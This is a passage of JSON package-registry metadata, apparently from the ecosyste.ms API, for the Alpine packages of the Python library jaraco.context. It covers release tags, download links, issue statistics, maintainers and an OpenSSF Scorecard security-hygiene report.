manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.788Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.20","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context-pyc/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-jaraco.context-pyc/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2423,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2024-06-12T01:13:46.463Z","updated_at":"2024-06-12T01:13:46.463Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.20","url":"https://pkgs.alpinelinux.org/packages?branch=v3.20","ecosystem":"alpine","default":false,"packages_count":24162,"maintainers_count":405,"namespaces_count":2,"keywords_count":4251,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1543},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-06-07T11:51:39.915Z","updated_at":"2026-08-24T05:06:36.705Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/namespaces"}},{"id":11139087,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-08-21T11:39:56.000Z","latest_release_published_at":"2024-08-21T11:39:56.000Z","latest_release_number":"6.0.1-r0","last_synced_at":"2026-03-25T00:05:49.502Z","created_at":"2024-12-07T12:44:55.014Z","updated_at":"2026-08-06T19:26:18.891Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.21/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.891Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.21","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2462,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2024-12-13T18:43:16.981Z","updated_at":"2024-12-13T18:43:16.981Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.21","url":"https://pkgs.alpinelinux.org/packages?branch=v3.21","ecosystem":"alpine","default":false,"packages_count":25394,"maintainers_count":413,"namespaces_count":2,"keywords_count":3607,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1400},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-12-06T12:06:36.014Z","updated_at":"2026-08-24T05:06:22.358Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/namespaces"}},{"id":10344631,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-15T17:23:11.000Z","latest_release_published_at":"2024-04-15T17:23:11.000Z","latest_release_number":"5.3.0-r0","last_synced_at":"2026-08-03T19:02:54.053Z","created_at":"2024-06-11T10:02:17.173Z","updated_at":"2026-08-06T19:26:18.772Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.20/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://re